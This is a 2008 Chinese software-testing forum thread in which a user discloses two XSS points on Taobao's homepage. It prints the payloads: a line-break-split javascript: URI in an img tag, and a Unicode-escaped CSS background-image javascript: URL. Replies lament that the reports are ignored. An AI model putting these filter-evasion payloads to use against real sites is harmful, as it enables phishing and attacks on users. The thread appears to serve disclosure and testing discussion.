设为首页收藏本站

开启辅助访问软件测试门户软件测试培训软件测试论坛测试解决方案文章资料精选软件测试博客软件测试招聘

51Testing软件测试论坛 »软件测试论坛 › [管理工具] › [安全测试工具] › 淘宝首页XSS（新的2处）

发新帖

查看: 5404|回复: 8

上一主题

下一主题

淘宝首页XSS（新的2处）

该用户从未签到

电梯直达

跳转到指定楼层

1^#

发表于 2008-10-21 13:38:59 | 只看该作者回帖奖励

回帖奖励

|倒序浏览 |阅读模式

写到自己博客上了：http://www.bzcyer.com/view.asp?id=72

这里也贴一份，虽然没多少实际的用途，最多就做下钓鱼，
1、可以插入回车、包括段末结尾符和换行符的两种、即char（10）和char（13）、tab空格

<img src="javas
cript:alert('test');">

2.转码

<DIV STYLE="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0061\006C\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029\0029">

原始的代码是： <DIV STYLE="background-image:url(javascript:alert('XSS'))">

刚那没转码的：<DIV STYLE="background-image:url(javascript:alert('XSS'))">，试下一样出问题，看来这里转不转码都会出问题。

首页, 淘宝, XSS

分享到: QQ好友和群 QQ空间 腾讯微博 腾讯朋友

相关帖子

【你来问我来答第140期】：敏捷测试的奥秘与挑战：问答专场！

回复

使用道具举报

该用户从未签到

2^#

楼主| 发表于 2008-10-21 13:40:53 | 只看该作者

在个人账户后台那，也有一些，taobao也没人处理，哎
现在是注册N多帐号，基本上测一次，报废1个帐号

回复支持反对

使用道具举报

该用户从未签到

3^#

楼主| 发表于 2008-10-27 14:54:53 | 只看该作者

淘宝客服的回复，哎...

本帖子中包含更多资源

您需要登录才可以下载或查看，没有帐号？(注-册)加入51Testing

x

【你来问我来答第140期】：敏捷测试的奥秘与挑战：问答专场！

回复支持反对

使用道具举报

该用户从未签到

4^#

发表于 2008-11-8 00:20:37 | 只看该作者

我在他们公司内网上也发过，可惜没有人理会。
还有很多。即使过滤过的一些漏洞，稍微变形一下，也可以测试出来。
无语了。

他们对xss不重视。
看来只有做出一个什么比较有危害的脚本，才可以“打动”他们。

不知道有没有注入漏洞。注入漏洞更危险。

回复支持反对

使用道具举报

该用户从未签到

5^#

楼主| 发表于 2008-11-8 18:53:30 | 只看该作者

这个只是小问题，都没人处理，那我手上的一些严重的权限bug，都不能公布在网上，想告诉淘宝，得，也没人理。

那就继续放着好了。

回复支持反对

使用道具举报

该用户从未签到

6^#

发表于 2008-12-23 16:01:26 | 只看该作者

淘宝照这样看来不安全哦

【你来问我来答第140期】：敏捷测试的奥秘与挑战：问答专场！

回复支持反对

使用道具举报

该用户从未签到

7^#

发表于 2008-12-24 17:44:22 | 只看该作者

有机会一定加强学习

回复支持反对

使用道具举报

该用户从未签到

8^#

发表于 2009-4-30 11:21:15 | 只看该作者

一年前的帖子，淘宝应该现在重视了吧~~

回复支持反对

使用道具举报

该用户从未签到

9^#

发表于 2011-11-16 14:54:37 | 只看该作者

幸亏我们不是黑客

【你来问我来答第140期】：敏捷测试的奥秘与挑战：问答专场！

回复支持反对

使用道具举报

发新帖

站长推荐 /1

小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 ) 关于我们

GMT+8, 2024-11-8 23:44 , Processed in 0.073514 second(s), 28 queries .

Powered by Discuz! X3.2

© 2001-2024 Comsenz Inc.

快速回复 返回顶部 返回列表